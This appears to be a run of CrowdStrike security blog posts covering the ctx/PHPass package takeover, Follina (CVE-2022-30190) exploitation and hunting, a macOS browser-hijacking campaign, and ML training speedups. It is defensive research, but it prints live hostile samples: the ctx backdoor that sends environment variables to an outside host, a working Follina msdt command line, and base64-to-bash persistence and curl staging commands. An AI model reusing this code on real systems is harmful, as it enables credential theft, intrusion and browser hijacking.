The software supply chain remains a weak link for an attacker to exploit and gain access to an organization. According to a report in 2021, supply chain attacks increased by 650%, and some of the attacks have received a lot of limelight, such as SUNBURST in 2020 and Dependency Confusion in 2021.

On May 21, 2022, multiple Python community Redditors reported that the Python package ctx was updated with malicious code after more than seven years of no changes, leading to removal of the package on May 24. Additionally, the domain used in the malicious code led to identification and removal of another PHP package, PHPass. Both packages were part of a deliberate attack that stole environment variables and any passwords stored as AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.

This attack highlighted a bigger issue where the Python repository PyPI and php package repositories like packagist are hosting more than 500,000 packages combined. Over time, many such packages that are still popular are abandoned by developers and become high-risk and vulnerable to supply chain attacks in certain cases.

The CrowdStrike Falcon® platform proactively protects customers against supply chain attacks with an adversarial-focused approach to cloud security.

Account Takeover of Packages CTX and PHPass by Attackers

In the case of ctx and PhPass, attackers used a typical technique of a repository account takeover where the attacker tries to find a popular repository owned by an email whose domain has expired. Here the attacker just needs to re-register the same domain and re-create maintainers email to reset the repository account passwords. After that, the attacker owns the repository and is able to make desired changes (e.g., embed a malicious code in a release). Both ctx and Phpass packages were compromised using the same technique. Let’s take a closer look at ctx.

ctx is a popular PyPI hosted package that was abandoned by the original developer years ago. The last release on the package was December 19, 2014. The account owner’s email and domain figlief[.]com expired in December 2016.

On May 10, 2022, an unclassified actor made an initial unsuccessful attempt to reset password for the ctx account owner as per Python Security. On May 14, 2022, attackers were back with an account takeover strategy where they registered expired figlief[.]com as shown in Figure 1. At this point attackers took control of the domain and were able to create the account owner’s email address. With PyPI api attackers were able to reset the password for the account owner and, on the same day, they released the malicious versions of ctx.

Figure 1. WHOIS data for domain registered by attackers on May 14, 2022

After taking control on the same day, attackers immediately replaced and released their own version with malicious code subsequently releasing more versions. Figure 2 shows the backdoor function sendRequest() added to Ctx class. Function sendRequest() is invoked whenever the ctx object is created. In some cases, it iterates through all the environment variables and looks for specific environment variables like AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. Then it encodes them as base64 string which is later sent to the attacker-controlled url https://anti-theft-web[.]herokuapp[.]com.

class Ctx(dict):

    def __init__(self):

        self.sendRequest()

    def sendRequest(self):
        string = ""
        for _, value in os.environ.items():
            string += value+" "

        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')

        response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)

Figure 2. Backdoor to steal environment variables

Here, heroku is a platform as a service (PaaS) that enables developers to build, run and operate applications entirely in the cloud. Attackers used it to host malicious data collectors which is a common attempt to blend into legitimate traffic. 

If you installed ctx/Phpass or have continuous integration/continuous delivery (CI/CD) pipelines run to do so between May 14 and May 24 till the malicious packages were removed, you may have been compromised. At the time of writing, a student hacker from Turkey has claimed responsibility for the attack. Figure 3 shows approximate daily downloads of both packages — about 2,000 a day before they were taken down.

Figure 3. Approximate per-day download of CTX and PHPass

CrowdStrike Detection

The Falcon platform proactively protects customers against supply chain attacks with its Falcon Cloud Workload Protection™ module. The platform keeps a track of the software bill of material (SBOM) of each cloud-native application by scanning each container image and hosts. It provides an in-depth view of application and OS dependencies, their versions and the vulnerabilities found in those dependencies. Additionally, it unlocks the Falcon platform to be able to detect any poisoned packages found in the wild, enabling discovery of any supply chain attacks exploiting the organization(shown in Figure 4). Figure 4 illustrates how CrowdStrike Falcon detects and alerts customers on a poisoned Python package.

Figure 4. CrowdStrike detection for poisoned Python package

Conclusion

Supply chain attacks are on the rise and account takeover is one of the techniques attackers use that has the most impact with minimal efforts. The increased adoption of cloud, container and CI/CD pipelines to build and deploy code has expanded the modern enterprise’s attack surface and increased the complexity of defending it from attack. It puts them at greater risk of compromise with a bigger blast radius that can easily propagate through different production environments and across geographical boundaries in a matter of minutes. 

To battle such attacks, enterprises must have a cloud-native arsenal that provides deeper visibility into cloud applications to know what’s being run under the hood; a Zero Trust approach to security; cloud workload behavior profiling; and the ability to audit and investigate breaches at large scale across cloud providers.

The CrowdStrike Falcon platform continues to deliver tools required by enterprises to protect against breaches in the cloud or hybrid environments.

Additional Resources

OverWatch Casts a Wide Net for Follina: Hunting Beyond the Proof of Concept

CVE-2022-30190, aka Follina, was published by @nao_sec on Twitter on May 27, 2022 — the start of Memorial Day weekend in the U.S. — highlighting once again the need for round-the-clock cybersecurity coverage. Threat hunting in particular is critical in these instances, as it provides organizations with the surge support needed to combat adversaries and thwart their objectives. 

The Follina vulnerability, classified as a zero-day, can be invoked via weaponized Office documents, Rich Text Format (RTF) files, XML files and HTML files. Moreover, there are a variety of ways this vulnerability can be used in the wild. As always, OverWatch threat hunters are casting a wide net in hunting for this activity — protecting customers against both known and unknown threats. 

The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs). As described in depth in this CrowdStrike blog about Follina, the Falcon sensor has detection and prevention logic that addresses exploitation of this vulnerability. With “Suspicious Process Blocking” enabled, Falcon will block code execution attempts from msdt.exe. Even without “Suspicious Process Blocking” enabled, the Falcon sensor will still generate a detection in the Falcon console.

Today’s determined adversaries, however, are known to be persistent and agile in their attempts to circumvent automated detections. OverWatch remains vigilant in tracking this new threat as it evolves to provide a strong last line of defense.

Hunting for Follina 

As with previous zero-day disclosures, OverWatch’s approach to hunting remains unchanged. OverWatch hunts specifically for hands-on-keyboard activity — not initial access vectors. Laser-focusing resources on post-exploitation behavior is a proven strategy that has effectively and efficiently uncovered sophisticated adversaries leveraging prior zero-day vulnerabilities, such as the Log4j vulnerability.

Over Memorial Day weekend, OverWatch analysts were on high-alert, actively monitoring  various open source intelligence outlets that showed early signs of an influx in ms-msdt usage.

Initial publications demonstrated a successful proof-of-concept utilizing Microsoft Word (winword.exe) as the parent process to msdt.exe. While OverWatch has also observed winword.exe as the predominant parent process leveraged for exploitation of Follina, threat hunters have also seen cmd.exe, explorer.exe and powershell.exe used as parent processes. The process tree below illustrates an attempted Follina exploitation as part of likely adversary emulation activity observed by OverWatch:

Figure 1. A process tree showing execution of arbitrary PowerShell via Microsoft Diagnostic Tool through a URI directive in a carefully crafted Word document.

Looking at the commands run as part of this adversary emulation, OverWatch observed an attempt to use regsvr32.exe to execute a malicious DLL file:

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(start-process('powershell')(@('regsvr32.exe','-u','C:\Users\Public\Documents\customDLL_stageless64.dll')))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"

This is an example of Exploitation for Client Execution (T1203), leading to the often-observed System Binary Proxy Execution (T1218) technique. This technique is leveraged in an attempt to evade endpoint detection and response teams and give a façade of legitimacy to malicious processes. By choosing to utilize the Follina vulnerability in such a way, an adversary is able to nest instances of System Binary Proxy Execution using several legitimate, signed Microsoft executables to facilitate the execution of malicious code:

  1. winword.exe (Microsoft Word Binary)
  2. msdt.exe (Microsoft System Diagnostic Tool)
  3. regsvr32.exe (DLL Registration Service Binary)

The primary threat posted by such nested obfuscation attempts is simple — by creating a complex process tree, which appears to be normal system behavior, adversaries can attempt to delay or avoid detection entirely. While the Falcon sensor does detect this type of activity, less mature security solutions, as well as systems administrators or less experienced security operation center analysts, may not alert on this activity and/or deem it malicious.

Figure 2. In this example, the vulnerability is abused via an interactive PowerShell session, showing how Follina may be abused to obfuscate further action on objectives once initial access has already been obtained.

Advanced Exploitation Technique Hunting

In addition to Microsoft Office products utilizing ms-msdt, PowerShell also executes any code via msdt.exe as it trusts Microsoft Protocol URIs. Therefore, adversaries can leverage the built-in web parsing capabilities of PowerShell to download malicious HTML containing ms-msdt directives. This allows the adversary to obfuscate any further commands by leveraging msdt.exe to execute arbitrary code as opposed to using Command and Scripting Interpreter (T1059) directly. Since adversaries can use wget to facilitate further action on objectives within the environment, OverWatch continues to hunt for malicious instances or anomalies surrounding the use of PowerShell’s built-in web request capabilities.

When hunting for Follina exploitation strings utilizing wget, curl or iwr, it is important to remember that they are aliases for the PowerShell cmdlet Invoke-WebRequest and as a result, the alias will not appear in the process tree.

Figure 3. While Falcon will show wget as a captured process operation, all web requests will take place entirely within PowerShell, using the Invoke-WebRequest cmdlet.

Utilizing an Event Search query developed by the OverWatch team, you can search for abuse of msdt.exe in your environment:

event_simpleName=ProcessRollup2 event_platform=win FileName=msdt.exe 
| search (PCWDiagnostic AND ms-msdt:)
| eval ProcessExplorer="https://falcon.crowdstrike.com/investigate/process-explorer"
| strcat ProcessExplorer "/" aid "/" TargetProcessId_decimal "?_cid=" cid ProcessExplorerURL
| table _time ParentBaseFileName CommandLine ComputerName UserName ProcessExplorerURL
| sort + _time

The first two lines of the query look for any executions of msdt.exe where the process event contains two keywords that are known to be present in successful exploitation attempts within the process command line. The third and fourth lines construct a Process Explorer link to the relevant msdt.exe process, which can be useful for triaging the executions. The final two lines format the results in a table, and sort them chronologically.

Please note that depending on which Falcon cloud you reside in, you may need to adjust the second line of the query which is used to generate a Process Explorer link:

Cloud PrEx URL String
US-1 https://falcon.crowdstrike.com/investigate/process-explorer
US-2 https://falcon.us-2.crowdstrike.com/investigate/process-explorer
EU https://falcon.eu-1.crowdstrike.com/investigate/process-explorer
Gov https://falcon.laggar.gcw.crowdstrike.com/investigate/process-explorer

Conclusion

The announcement of Follina follows a trend that OverWatch has observed in which zero-day exploits are released leading up to or on a long weekend. Holiday weekends are an opportune time for adversaries to exploit zero-days as organizations tend to have reduced resources available and respond slower to threats.

OverWatch, armed with the power of CrowdStrike Security Cloud, leverages statistical-, hypothesis- and intelligence-driven threat hunting 24/7/365 to discover malicious artifacts and detection methods not accounted for in automated, passive monitoring. As new vulnerabilities like Follina hit the news, OverWatch immediately begins analyzing customer environments for threat activity and alerts them to risks. OverWatch’s hunting methodology moves beyond the zero-day, protecting customers against all threats regardless of the initial access vector.

OverWatch Elite builds on the 24/7 threat hunting operations provided as a part of OverWatch standard and includes additional services, such as: 60-minute call escalation for critical threats, quarterly threat briefings, tailored threat hunting and more. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

Additional Resources

CrowdStrike Uncovers New MacOS Browser Hijacking Campaign

2 June 2022 at 12:46
  • CrowdStrike analyzed a new browser hijacking campaign that targets MacOS
  • The purpose of the campaign is to inject ads into the user’s Chrome or Safari browser 
  • The CrowdStrike Falcon® platform provides continuous protection against browser hijacking threats by offering real-time visibility across workloads

The CrowdStrike Content Research team recently analyzed a MacOS targeted browser hijacking campaign that modifies the user’s browsing experience to deliver ads. Research began with a variant that uses a combination of known techniques to deliver, persist and sideload a Chrome extension. Analysis of the fake Chrome installer uncovered the use of more than 40 unique dropper files to install the extension. During analysis of the original samples, an additional variant was discovered that targets Safari browser usage and employs a combination of AppleScript and Python to accomplish similar browser hijacking activity. At the time of writing, more than 15 unique dropper files have been found for this particular variant.

Technical Analysis

Fake Chrome Installer

The Chrome variant sideloads a malicious Chrome extension with the purpose of hijacking browser activity and delivering custom ad content. 

Installation

The initial infection vector uses an Apple Disk Image (DMG) that masquerades as legitimate software and video files. Once the DMG file is mounted on the machine and the user is tricked into clicking the application icon, an install script is executed to initialize the setup process, as shown in Figure 1.

Figure 1. Example of DMG installation instructions

While the DMG file names are masquerading as software and video files, they all share a similarity and result in a mounted volume with the name Application Installer. The mounted volume prompts the user to execute an apparent Chrome installation application, but this is actually a malicious script file contained in the DMG. Early variants of this family used script files named installer.command. Later variants use ChromeInstaller.command script files. 

Upon initialization, the install script hides visible Terminal windows from the user’s view by leveraging osascript to conceal the installation actions. Then it makes a query for an existing infection by checking the results of launchctl list | grep "chrome.extension" and exits if the command returns any matching launchd jobs. 

Prior to downloading the extension, an attempt is made to validate the returned status code from the web server using curl:

status_code=$(curl --write-out %{http_code} --head --silent --output /dev/null https[:]//ckgrounda[.]com/archive.zip )

If the return code is 200, curl is again used to download and write the archive file with the zipped payload written to /private/var/temp/[uuid].zip. The native unzip utility is used to expand the archive into a new folder also named with a random UUID in /private/var/temp/. Any other return code results in the script exiting. 

Persistence 

The Chrome extension is installed and maintained by a number of plist files written to the user directory ~/Library/LaunchAgent/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding.

<key>ProgramArguments</key>
<array>
<string>sh</string>
<string>-c</string>
<string>echo aWYgcHMg -[ SNIP ]- Zmk= | base64 --decode | bash</string>
</array>

Below is a list of each file created, the Base64 decoded file contents and the description.

StartInterval Values (seconds) Decoded Plist Payloads Description
com.chrome.extension.plist
31 if ps ax | grep -v grep | grep 'Google Chrome' &> /dev/null; then echo running;  EXTENSION_SERVICE='Google Chrome --load-extension'; if ps ax | grep -v grep | grep 'Google Chrome --load-extension' &> /dev/null; then echo e running; else   pkill -a -i 'Google Chrome'; sleep 1 ;  open -a 'Google Chrome' --args --load-extension='/private/var/temp/[rand uuid]' --restore-last-session --noerrdialogs --disable-session-crashed-bubble; fi;  else echo not running; fi Resolve/hide crashes
com.chrome.extensions.plist
21600 pkill -a -i 'Google Chrome'; sleep 1 ;  open -a 'Google Chrome' --args --load-extension='/private/var/temp/[rand uuid]' --restore-last-session --noerrdialogs --disable-session-crashed-bubble; Force the extension load
com.chrome.extensionsPop.plist
3600 open -na 'Google Chrome' --args -load-extension='/private/var/temp/[rand uuid]' --new-window "$https[:]//ationwindon[.]com/?tid=949115" Ensure ad is always open

As shown above, the naming convention of the plist files attempts to evade general suspicion by masquerading as components of the Chrome browser. 

All of the Launch Agents utilize a StartInterval parameter. This means that each is executed periodically on its defined interval. 

Note that the com.chrome.extensionsPop.plist appears to have a typo in the “-load-extension parameter; however, the command works as expected and is successful in sideloading the extension. A notable commonality across the variants analyzed is the check-in domain ationwindon[.]com.  

Extension Initialization 

The extension is sideloaded from disk via any of the plists using the --load-extension parameter. The extension utilizes a number of alarms and blocking listeners to facilitate its browser hijacking and ad content delivery.

The extension contains a hard-coded command-and-control (C2) domain referred to in this blog as C2Domain, and a unique identifying string defined as ExtensionId. These static values are used to reference the C2 domain and extension ID in the blog; however, each extension analyzed contained its own unique values. 

The extension contains a system to provide time-dependent storage for ad content and dynamic parameters sent from the C2. This is accomplished by storing and retrieving JSON objects from Chrome’s localStorage. Key/Value pairs are stored with expiry value. Retrieved objects with an expiry value less than the current time are returned as null and removed from localStorage

Upon execution, the extension establishes two Chrome alarms: a heartbeat and an update frequency for ad content. The heartbeat alarm fires every three hours while the ad alarm triggers every 30 minutes. After configuring these parameters, the extension beacons to the C2 with a message signifying a successful install. It is sent using the following format:

https://[C2Domain]/install?ext=[ExtensionName]&ver=[ExtensionVersion]&dd=[ExtensionId]

Following the beacon and an initial heartbeat, the extension enumerates all installed extensions running in Chrome using a chrome.management.getAll() call. The ExtensionInfo[] response is sent as JSON in a POST message back to the C2 domain.

The POST response contains a list of extensions IDs in a JSON list. These IDs are then used to disable extensions using chrome.management.setEnabled() API calls. This is done to remove extensions that conflict with the hijacking functionality. 

As a final install step, the extension modifies a policy in Chrome to disable search suggestions by disabling the searchSuggestEnabled field. This also disables keyword search and autocompletion capabilities. 

The first listener monitors web requests destined for the hardcoded C2 domain. Any requests to the domain are appended with the ExtensionId as a requestHeader. This additional request header serves to identify victims. Responses from this domain are also monitored for a randomness variable (rand) in the requestHeader. This randomness variable is stored in localStorage with an expiration time of 300 seconds. The randomness variable is used to provide inconsistency to the search hijacking functionality.

Hijack via a Blocking Listener

Next, the extension establishes a blocking listener to facilitate the search hijacking. This listener runs on outbound requests to URLs containing “google.,search.yahoo or “bing.. If the requests contain search parameters, a random float value is generated between 0 and 100. If the random float is less than the rand variable, then the search request is redirected to the following URL:

https://[C2Domain]/search?ext=[ExtensionName]&ver=[ExtensionVersion]&is=[OriginalSearchRedirectBoolean]&q=[OriginalSearchQuery]

It can be theorized that the rand variable exists to evade users’ suspicion that their machines are infected. With it set, only a portion of a user’s web searches will be redirected.

Defense Evasion

The extension configures three techniques to evade discovery and deletion. The extension adds a listener for chrome://extensions, and any requests to that page will be redirected to chrome://settings. The extension configures onClicked actions so that a left or right-click on the extension’s context menu will also open a tab to chrome://settings. Finally, if the user is able to bypass these barriers, the extension configures an UninstallURL so a tab to the following URL will be opened if the extension is successfully removed:

https://[C2Domain]/uninstall?ext=[ExtensionName]&ver=[ExtensionVersion]&dd=[ExtensionId]

Core Functionality

The core functionality of the extension comes from its two alarms. These alarms run periodically to maintain the C2 heartbeat and update the delivered ad content. 

Heartbeat Alarm

Every three hours, the heartbeat alarm makes a series of callouts to the C2. First, it makes a GET request to:

https://[C2Domain]/hb?ext=[ExtensionName]&ver=[ExtensionVersion]&dd=[ExtensionId]

This is followed by a GET request to https://[C2Domain]/redsync, and the response of this request is sent in a call to:

https://[C2Domain]/sync?ext=[ExtensionName]&ver=[ExtensionVersion]&dd=[ExtensionId]&info=[Response]

The heartbeat and response do not influence the client-side code. The extension does not handle any fail requests or returned data. It just serves as a check-in to the C2 and is simply a notification of a live infection. 

Ad Alarm

The ad alarm runs every 30 minutes. Its objective is to ensure that the ad content is updated and running. To do this, it retrieves the ad object from the expiry storage. If it is expired, new ad content is loaded from:

https://[C2Domain]/ad?ext=[ExtensionName]&ver=[ExtensionVersion]&dd=[ExtensionId]

This content is opened in a new tab, and the new tab’s tabId is stored in expiry storage with a 24-hour expiration date. If the alarm runs and the ad content is not expired, then it checks to see if the tabId is still open. If it isn’t, it proceeds as if the ad content is expired.

Fake Safari Installer

Research into this family led to the discovery of a variant targeting the Safari browser. This variant shares many similarities to the Chrome variant; however, it is technically less advanced. 

Installation

The Safari installer variant shares a similar delivery mechanism via DMGs with random names and the Application Installer volume name; however, all Safari DMGs have been observed to use script files with the naming convention SafariInstaller.command.

Much like the Chrome variant, the SafariInstaller.command files download their payload from statically defined staging servers. The response contains two Base64 data blobs that decode into Python code. These blobs are inserted directly into two plist files. Unlike the Chrome variant, the plist files pipe the Base64 decoded data to Python and then bash.

<key>ProgramArguments</key>
<array>
<string>sh</string>
<string>-c</string>
<string>echo aW1w -[ SNIP ]- kKQ== | base64 --decode | python  | bash</string>
</array>

Persistence and Core Functionality

The first plist, ~/Library/LaunchAgents/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. 

At the time of writing, the Python payload runs in an infinite loop and serves two functions:

  1. Sends a periodic heartbeat (approximately every hour)
  2. Monitors search engine queries in Safari

The script ensures that only one copy is running via a call to ps aux. If any process commandline contain base64 –decode | python, then the newly executing script exits. 

The hourly heartbeat calls out to:

https://[C2Domain]/hb?ext=saf&ver=[ScriptVersion]&is=0&dd=[ScriptId]&q=[LastSearchQuery]

Similar to the Chrome extension, the Python script monitors searches to Google, Yahoo and Bing through the use of AppleScript. Every loop interval (~0.1 seconds), the following osascript process is used to capture the currently opened Safari URL:

osascript -e 'tell application "safari"
set curURL to URL in front document
return curURL
end tell’

If a new search query is found, the Safari window’s URL is overwritten with: 

https://[C2Domain]/search?ext=saf&ver=[ScriptVersion]&is=0&dd=[ScriptId]&q=[OriginalSearchQuery]

This is accomplished by the following osascript process: 

osascript -e 'tell application "safari"
set URL in front document to "[URL]"
end tell’

If the script detects that it does not have the necessary transparency, consent and control (TCC) permissions to launch osascript or call out to the C2, it will launch a tccutil subprocess to reset all permissions for Apple Events. By resetting this value, the user will be re-prompted with a security warning. The author is hoping that because of the new prompt, the user will allow the Apple Events communication. 

The SafariInstaller.command script writes its second plist file to ~Library/LaunchAgents/com.extension.pop.plist. This plist serves the same purpose as com.chrome.extensionsPop.plist. It uses Python and an os.system call to open a new Safari window to the same https[:]//ationwindon[.]com domain observed in the Chrome installer variants.

Impact

Both variants result in an altered user experience. Accomplished through the Chrome extension or AppleScript, both variants are highly persistent and perform browser hijacking. They are successful in continually displaying ad content and redirecting web searches to attacker-controlled redirect pages. 

The Falcon Platform’s Continuous Monitoring and Visibility

The Falcon platform takes a layered approach to protect workloads. Using on-sensor and cloud-based machine learning, behavior-based detection using indicators of attack (IOAs), and intelligence related to tactics, techniques and procedures (TTPs) employed by threats and threat actors, the Falcon platform enables visibility, threat detection and continuous monitoring for any environment, reducing the time to detect and mitigate threats.

Figure 2. Suspicious plist creation (Click to enlarge)

The Falcon platform’s behavior-based IOAs detect and prevent behaviors that indicate malicious intent. For example, Falcon detects and prevents behavior such as the installation of suspicious ASEP plist files (see Figure 2) and execution of sideloaded, suspicious Chrome extensions (see Figure 3).

Figure 3. Previously infected host IOA detection (Click to enlarge)

Indicators of Compromise (IOCs)

The hashes below are a small subset of the total DMGs and corresponding installer scripts uncovered in the campaign, to be used as reference samples.

File SHA256
Your File Is Ready To Download.dmg 46bbb3103bdc2263a0b50eb80815705f61885b3e3e132e5e5c5ff822512085ca
SafariInstaller.command e31607b87355b4ae3e5f96c6b48ed783e6b706fb1c2ab6a1ff25a13af615bca7
nature_beautiful_short_video_720p_hd (2).dmg 81ac23cc9dba6bed6e33d172e011ead46254a29483c287f35c670d81bc9785b7
ChromeInstaller.command e734ec9832f8385eb737dd024eb96d53d0d3cb534a72afb4730db8e7e6162fcc
BigBrother_AnotherStory-0.07.p2.00-mac.zip.dmg 53ddfdb4c01ace20322647eead73ddf77e6d9613b73ca90521c2e57063be387b
installer.command 83d6ab417c9a362e6292dd8d85032b623889d9154b9d357fd8576f843fbecae9
Domains
ationwindon[.]com

Additional Resources

CrowdStrike Falcon Protects Customers from Follina (CVE-2022-30190)

1 June 2022 at 15:49
  • On May 27, 2022, a remote code execution vulnerability was reported affecting the Microsoft Windows Support Diagnostic Tool (MSDT)
  • The vulnerability, which is classified as a zero-day, can be invoked via weaponized Office documents, Rich Text Format (RTF) files, XML files and HTML files
  • At time of writing, there is no patch available from the vendor
  • The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs)

A new zero-day remote code execution vulnerability (CVE-2022-30190) was reported by security researchers on May 27, 2022. The flaw, dubbed Follina, affects the Microsoft Windows Support Diagnostic Tool (MSDT). Successful exploitation of the vulnerability abuses native trust granted to the Microsoft Windows Diagnostics Tool (msdt.exe) allowing it to download and execute remote code. At time of writing, research indicates that exploiting file-based versions of the vulnerability requires user interaction, by opening a tained Microsoft Office, RTF, XML or HTML file.

Proof-of-concept payloads are publicly available and exploitation of this vulnerability is of low complexity.

A Primer on How the Vulnerability Works

The initial proofs of concept (POCs) leverage a Microsoft Office remote template feature to retrieve a weaponized HTML file from a remote server. Once retrieved, the HTML file utilizes the ms-msdt MSProtocol URI to import shellcode and execute PowerShell commands. 

This vulnerability bears similarities to CVE-2021-40444 as both manipulate how HTML or Javascript code is loaded through an external link. However, Follina is significantly less complex to leverage and contains fewer dependencies. 

How CrowdStrike Falcon Protects Customers from Follina

Demo: How CrowdStrike Detects and Prevents the Follina Vulnerability

The CrowdStrike Falcon platform takes a defense in-depth approach to protecting customers by employing machine learning (ML) and behavior-based IOAs. The Falcon platform uses incoming telemetry to power its detections and provide real-time threat mitigation for customers.

CrowdStrike’s Rapid Response team was able to enhance existing coverage immediately via proactive threat-hunting combined with malware and exploit research. As soon as critical content is available, the Falcon platform pushes updates in real time to all customers without having to upgrade or update the sensor. 

The Falcon sensor has detection and prevention logic that addresses exploitation of this vulnerability. With “Suspicious Process Blocking” enabled, Falcon will block code execution attempts from msdt.exe. Even without “Suspicious Process Blocking” enabled, Falcon will generate a detection in the Falcon console.

Follina Phishing Attack Prevention Scenario

An attacker can send a maliciously crafted Microsoft Office or RTF document via email to invoke remote code execution when run. CrowdStrike Falcon has prevention and detection capabilities that can immediately shut down attack attempts such as these.

(Click to enlarge)

Follina PowerShell (wget) Attack Prevention Scenario

As reported, an attacker can leverage non-document techniques — such as a wget request from PowerShell to an attacker controlled domain — to retrieve an HTML payload to further actions on objectives via remote code execution. Again, the Falcon platform automatically prevents and detects this attack scenario using behavior-based IOAs.

(Click to enlarge)

Falcon Spotlight Shines a Light on Vulnerable Endpoints

Organizations looking to gain additional visibility into endpoints vulnerable to Follina (CVE-2022-30190) can turn to the CrowdStrike Falcon Spotlight™ module of the Falcon platform for always-on automated vulnerability management. Falcon Spotlight, together with research and analysis from CrowdStrike’s Threat Intelligence Team, offers valuable insights that allow customers to create a defensible security posture. 

Falcon Spotlight customers have access to a trending threat dashboard that provides insights into the vulnerability to aid them in tracking their exposure and remediation progress.

(Click to enlarge)

Note: More detailed intelligence and technical information about Follina (CVE-2022-30190) is available to CrowdStrike customers through the Falcon console and Support Portal

Additional Resources

How CrowdStrike Achieves Lightning-Fast Machine Learning Model Training with TensorFlow and Rust

1 June 2022 at 12:52
  • CrowdStrike combines the power of the cloud with cutting-edge technologies such as TensorFlow and Rust to make model training hundreds of times faster than traditional approaches
  • CrowdStrike continuously advances machine learning capabilities to set the industry standard in protecting customers from sophisticated threats and adversaries

Supercharging CrowdStrike’s artificial intelligence requires both human professionals and the right technologies to deliver blisteringly fast and accurate machine learning model training with a small footprint on the CrowdStrike Falcon® sensor. CrowdStrike data scientists continuously explore theoretical and applied machine learning research to advance and set the industry standard in protecting customers from sophisticated threats and adversaries.

In recent years, deep learning models have achieved incredible performance in a variety of machine learning tasks, especially in the areas of computer vision and natural language processing. A major reason for deep learning’s mainstream adoption can be credited to the rise of powerful and open-source deep learning frameworks, the two most popular being PyTorch and TensorFlow. These frameworks provide extensive capabilities, documentation and tools to build machine learning models. Even with these excellent resources, implementing a fast end-to-end training workflow can be challenging. Various factors, including the type of computing resources used and how data processing is implemented, can contribute to how long it takes to train a model.

Here we share some details and insights on the journey to a faster training pipeline for one of CrowdStrike’s latest text classification models.

Building an Initial TensorFlow Training Pipeline

TensorFlow is a powerful open-source machine learning library that provides a comprehensive and flexible ecosystem for building machine learning models in Python. It provides an intuitive high-level API (Keras) and thorough documentation with examples on how to get started building a model training pipeline. 

A common first step to model development is to get a simple model training workflow running on a local machine with a small amount of data, before scaling up to training on the full dataset. The training workflow consists of reading in each file, processing the data (equivalent to feature extraction for our use case), training the model and evaluating model results. TensorFlow’s tf.data is used to create the data pipeline, as its API enables building input pipelines from simple and reusable pieces, optimized to read in data and do transformations efficiently as part of the model training process.

Figure 1. Simplified view of the initial training pipeline

Initial Training Results

With an end-to-end training pipeline working on a small data subset, it’s time to train on the full training dataset, consisting of 1.9 million text files and totaling over 70 GB of data. 

Using a MacBook Pro with 32 GB CPU memory and 2.3 GHz 8-core Intel i9 processor, total training takes 65 epochs to complete (an epoch in machine learning means one complete pass of the training dataset). With each epoch taking roughly 3 hours and 30 minutes, this results in a total training time of approximately 227 hours — more than 9 days! Based on these training times, the need to speed up model training is clear, as many more model training runs are required for hyperparameter tuning and feature experimentation.

Trained On Training Dataset Total Training Epochs Total Training Time
MacBook Pro Laptop 1.9 million text files 65 227 hours

Analyzing Our Training Pipeline with TensorBoard Profiler

In addition to the comprehensive Python API that TensorFlow provides for training machine learning models, it also provides a powerful tool called TensorBoard, which has an intuitive web interface to help analyze machine learning workflows.

TensorBoard supports a profiler tool, which can be used to understand hardware resource consumption and various TensorFlow operations in your machine learning model. It enables metrics and visualizations to help identify performance bottlenecks in your training pipeline.

Figure 2. The profiler tool in TensorBoard (Click to enlarge)

By using the TensorBoard profiler, we observe in the training pipeline that data preprocessing on the CPU takes a significant amount of processing time.

Speeding Up Feature Extraction with Rust

The data preprocessing part of the pipeline, which is equivalent in this case to feature extraction, consists of reading the text file into memory, performing some data transformation operations and outputting a feature vector of integers for each file. There is an opportunity to speed up the feature extraction part of the pipeline by replacing the Python implementation with Rust.

The Rust programming language and compiler ensures memory safety in programs at compile time, without resorting to managed memory and the overhead of a Garbage Collector. This is essential for writing secure code that is expected to run with strong memory and performance requirements, on a client machine, while working on untrusted and potentially malicious data. After implementing the feature extraction (FX) logic in Rust, it is then compiled and the resulting library is packaged in a Python package. This package can be easily imported into our Python code for use, replacing the original Python FX code in the Tensorflow pipeline. When the Rust FX Python package is used, the following occurs: 

  1. The package takes the input data in Python.
  2. It passes the input data to the compiled Rust library.
  3. Then the calculations occur in machine code.
  4. Finally, results are passed back to Python. 

This solution works well, as it speeds up the feature extraction operations using the Rust compiled library, while also easily integrating into existing Python code as a simple import statement and function call.

Figure 3. Replacing the Python feature extraction code with Rust

By replacing the Python feature extraction code with Rust, total training time decreases from 227 hours to 162 hours.

Trained On Training Dataset Total Training Epochs Total Training Time
MacBook Pro Laptop 1.9 million text files 65 162 hours

GPU-enabled Model Training

Amazon Web Services (AWS) provides a large variety of EC2 instances to support different compute needs. The P3 instances fit the requirements for this use case, as P3 instances have NVIDIA V100 Tensor Core GPUs — a GPU is a specialized processing unit that can perform rapid mathematical operations, making it ideal for machine learning — and are set up with CUDA, which can accelerate TensorFlow model training on GPUs. Specifically, a p3.8xlarge instance has a large amount of CPU memory and multiple GPUs, providing opportunities to speed up model training.

Figure 4. Amazon EC2 P3 instance product details (Source: https://aws.amazon.com/ec2/instance-types/p3/)

Setting up a GPU-enabled compute environment to work correctly with TensorFlow can be a challenging process, as it can require non-trivial modifications and installs to address version mismatching between the OS, NVIDIA drivers and CUDA libraries. However, using Docker makes these types of modifications to the instance unnecessary.

Docker is an open platform for developing, shipping and running applications in a container-based environment, reducing effort and risk of problems with trying to set up application dependencies directly on an instance. Specifically, a public TensorFlow-NVIDIA Docker image is used on the P3 instance. With everything working as expected within the Docker environment, modifying NVIDIA drivers or CUDA libraries on the instance is not required.

Figure 5. Using Docker in a container-based environment

GPU Training Results

